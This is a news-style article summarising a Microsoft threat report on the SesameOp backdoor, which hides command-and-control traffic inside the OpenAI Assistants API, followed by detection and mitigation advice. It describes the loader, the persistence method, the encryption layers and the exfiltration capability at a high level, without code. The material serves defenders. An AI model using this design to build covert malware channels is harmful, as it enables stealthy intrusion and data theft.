Microsoft’s latest threat report has revealed a worrying trend: attackers are now using artificial-intelligence platforms as part of their command-and-control systems. The newly discovered SesameOp backdoor abuses the OpenAI Assistants API to hide its activity inside normal network traffic. Instead of relying on custom servers or shady hosting, the operators turned OpenAI’s trusted cloud service into their covert communications channel. The discovery underscores how criminals are adapting quickly, transforming legitimate AI tools into stealthy conduits for malware.
How the SesameOp Backdoor Works
According to Microsoft’s Digital Security Response Team, SesameOp infiltrates systems through an obfuscated loader named Netapi64.dll. Once installed, it injects itself into development tools like Visual Studio utilities to gain persistence and avoid detection. The malware then loads a .NET component called OpenAIAgent.Netapi64, which connects directly to the OpenAI Assistants API over HTTPS.
What makes this noteworthy is how it hides commands. Each infected machine is tagged through the assistant’s name, while instructions arrive disguised as encrypted messages stored in the assistant’s metadata. The system decrypts, executes, and then quietly sends the results back through the same API. Because all communication occurs through legitimate OpenAI servers, the traffic looks perfectly normal to most monitoring tools.
Technical Details and Evasion Methods
SesameOp’s configuration includes an API key, dictionary name, and proxy address packed inside its binary. It encrypts its payloads using AES and RSA algorithms, compresses data with GZIP, and encodes everything in Base64 before transmitting. The backdoor’s authors also used Eazfuscator.NET to make reverse engineering more difficult.
By blending into developer workflows and trusted .NET binaries, SesameOp can persist undetected for months. Its command types range from executing scripts and fetching payloads to collecting files for exfiltration. Because the connection targets api.openai.com, defenders rarely suspect that the traffic could conceal malware instructions.
Detection and Mitigation
Microsoft recommends continuous monitoring of outbound requests to OpenAI endpoints, especially from machines that should not use AI services. Security teams should enable tamper protection and ensure endpoint detection tools operate in block mode rather than alert-only mode. Rotating and auditing AI API keys regularly helps prevent attackers from exploiting stolen credentials.
Network segmentation remains essential: developer and production environments should be isolated to contain any breach. Administrators can also inspect assistant creation logs to detect unusual metadata or encoded messages. These steps make it harder for attackers to use AI platforms as hidden control planes.
Wider Implications for AI Security
SesameOp malware shows that threat actors no longer need to compromise vulnerable servers; they can simply misuse trusted cloud APIs to achieve the same effect. As AI integration grows, so does the attack surface. Organisations must therefore treat AI services like any other critical infrastructure, complete with monitoring, access controls, and abuse detection.
For AI providers, this incident is a warning to implement stronger behavioural checks that can identify abnormal API usage. Monitoring the context of assistant creation, metadata patterns, and communication frequency could reveal similar abuses before they escalate.
Final Thoughts
The SesameOp backdoor represents a new stage in cyber operations where legitimate AI services become tools for deception. By embedding its control traffic inside the OpenAI Assistants API, the malware demonstrated how easily trusted platforms can be repurposed for stealth. Security teams must now include AI endpoints in their visibility plans, enforce strict API governance, and rotate credentials frequently. As adversaries continue to blur the line between legitimate cloud use and abuse, awareness and proactive monitoring remain the strongest defence.